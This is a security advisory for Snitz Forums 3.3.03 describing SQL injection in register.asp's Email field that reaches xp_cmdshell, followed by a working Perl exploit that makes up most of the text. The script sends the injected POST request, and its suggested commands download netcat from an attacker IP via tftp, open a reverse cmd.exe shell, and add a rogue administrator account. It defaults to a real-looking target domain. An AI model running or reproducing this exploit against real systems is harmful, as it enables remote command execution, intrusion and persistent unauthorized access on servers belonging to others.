Snitz Forums v3.3.3 has an SQL injection vulnerability in its register.asp page with its Email variable. Because register.asp does not check user input, remote users can execute stored procedures, such as xp_cmdshell, to arbitrarily run non-interactive commands on the system.
88e2db0c77773604dc8879db1c1af96995d5144b910b58b58ca6716c337beb02
Overview:
Snitz Forums 2000, one of the best ASP based bulletin board systems on
the market. Getting better every day! A complete board system (forum)
that allows the user access to a friendly and intuitive interface.
http://forum.snitz.com
Problem Description:
Snitz Forums 3.3.03 has an SQL injection vulnerability in its "register.asp"
page with its "Email" variable. Because "register.asp" doesn't check
user input, remote users can execute stored procedures (such as "xp_cmdshell")
to arbitrarily run non-interactive commands on the system.
Vendor Notification:
Vendor notified last month. This is a deprecated version and users should
upgrade immediately.
Versions Affected:
3.3.03
Most likely earlier versions (not tested)
Fix:
Upgrade to 3.4.03, the latest version.
Exploit:
See attached proof-of-concept Perl exploit.
#!/usr/bin/perl
use Socket;
print "\nRemote command execution against Snitz Forums 3.3.03 (and probably others).\n";
print "You accept full responsibility for your actions by using this script.\n";
print "INTERNAL USE ONLY!! DO NOT DISTRIBUTE!!\n";
print "\nWeb server? [www.enterthegame.com]: ";
my $webserver = <STDIN>;
chomp $webserver;
if( $webserver eq "" )
{
$webserver = "www.enterthegame.com";
}
print "\nWeb server port? [80]: ";
my $port = <STDIN>;
chomp $port;
if( $port eq "" )
{
$port = 80;
}
print "\nAbsolute path to \"register.asp\"? [/forum/register.asp]: ";
my $path = <STDIN>;
chomp $path;
if( $path eq "" )
{
$path = "/forum/register.asp";
}
print "\nCommand to execute non-interactively\n";
print " Example commands: tftp -i Your.IP.Here GET nc.exe\n";
print " nc.exe -e cmd.exe Your.IP.Here YourNetcatListeningPortHere\n";
print " or: net user h4x0r /add | net localgroup Administrators h4x0r /add\n";
print "Your command: ";
my $command = <STDIN>;
chomp $command;
$command =~ s/\ /\%20/g;
if( open_TCP( FILEHANDLE, $webserver, 80 ) == undef )
{
print "Error connecting to $webserver\n";
exit( 0 );
}
else
{
my $data1 = $path . "\?mode\=DoIt";
my $data2 = "Email\=\'\%20exec\%20master..xp_cmdshell\%20\'" . $command. "\'\%20--\&Name\=snitz";
my $length = length( $data2 );
print FILEHANDLE "POST $data1 HTTP/1.1\n";
if( $port == 80 )
{
print FILEHANDLE "Host: $webserver\n";
}
else
{
print FILEHANDLE "Host: $webserver:$port\n";
}
print FILEHANDLE "Accept: */*\n";
print FILEHANDLE "User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\n";
print FILEHANDLE "Keep-Alive: 300\n";
print FILEHANDLE "Referer: http:\/\/$webserver$path\?mode\=Register\n";
print FILEHANDLE "Content-Type: application/x-www-form-urlencoded\n";
print FILEHANDLE "Content-Length: $length\n\n";
print FILEHANDLE "$data2";
print "\nSQL injection command sent. If you are waiting for a shell on your listening\n";
print "netcat, hit \"enter\" a couple of times to be safe.\n\n";
close( FILEHANDLE );
}
sub open_TCP
{
my( $FS, $dest, $port ) = @_;
my $proto = getprotobyname( 'tcp' );
socket( $FS, PF_INET, SOCK_STREAM, $proto );
my $sin = sockaddr_in( $port, inet_aton( $dest ));
connect( $FS, $sin ) || return undef;
my $old_fh = select( $FS );
$| = 1;
select( $old_fh );
return 1;
}